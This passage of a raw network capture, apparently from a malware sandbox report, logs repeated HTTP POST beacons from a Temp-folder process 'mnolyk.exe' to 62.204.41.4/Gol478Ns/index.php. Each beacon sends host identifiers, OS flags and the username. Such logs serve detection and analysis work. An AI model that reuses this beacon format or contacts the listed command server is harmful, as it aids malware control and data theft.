Feb 7, 2023 20:03:06.383594036 CET	625	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
471	192.168.2.6	50196	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:06.562601089 CET	626	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:06.626566887 CET	626	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
472	192.168.2.6	50197	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:06.840701103 CET	627	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:06.904644966 CET	627	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
473	192.168.2.6	50198	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:07.083062887 CET	628	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:07.148803949 CET	628	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
474	192.168.2.6	50199	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:07.326755047 CET	629	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:07.389992952 CET	629	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
475	192.168.2.6	50200	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:07.560015917 CET	630	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:07.623392105 CET	630	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
476	192.168.2.6	50201	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:07.797560930 CET	631	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:07.863240004 CET	631	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
477	192.168.2.6	50202	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:08.029584885 CET	632	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:08.095988035 CET	632	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
478	192.168.2.6	50203	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:08.264781952 CET	633	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:08.329248905 CET	633	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
479	192.168.2.6	50204	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:08.498528957 CET	634	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:08.562843084 CET	634	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
48	192.168.2.6	49767	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:02.575090885 CET	161	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:02.641204119 CET	161	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
480	192.168.2.6	50205	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:08.738599062 CET	635	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:08.804395914 CET	635	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
481	192.168.2.6	50206	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:08.986815929 CET	636	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:09.053705931 CET	636	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
482	192.168.2.6	50207	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:09.251394033 CET	637	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:09.317115068 CET	637	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
483	192.168.2.6	50208	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:09.500906944 CET	638	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:09.565390110 CET	638	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
484	192.168.2.6	50209	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:09.736542940 CET	639	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:09.801541090 CET	639	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
485	192.168.2.6	50210	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:09.990258932 CET	640	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:10.056719065 CET	640	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
486	192.168.2.6	50211	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:10.237660885 CET	641	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:10.302833080 CET	641	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
487	192.168.2.6	50212	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:10.483510971 CET	642	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:10.548284054 CET	642	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
488	192.168.2.6	50213	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:10.733288050 CET	643	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:10.797100067 CET	643	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
489	192.168.2.6	50214	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:10.972258091 CET	644	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:11.035756111 CET	644	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
49	192.168.2.6	49768	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:02.811172962 CET	162	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:02.876564026 CET	162	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
490	192.168.2.6	50215	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
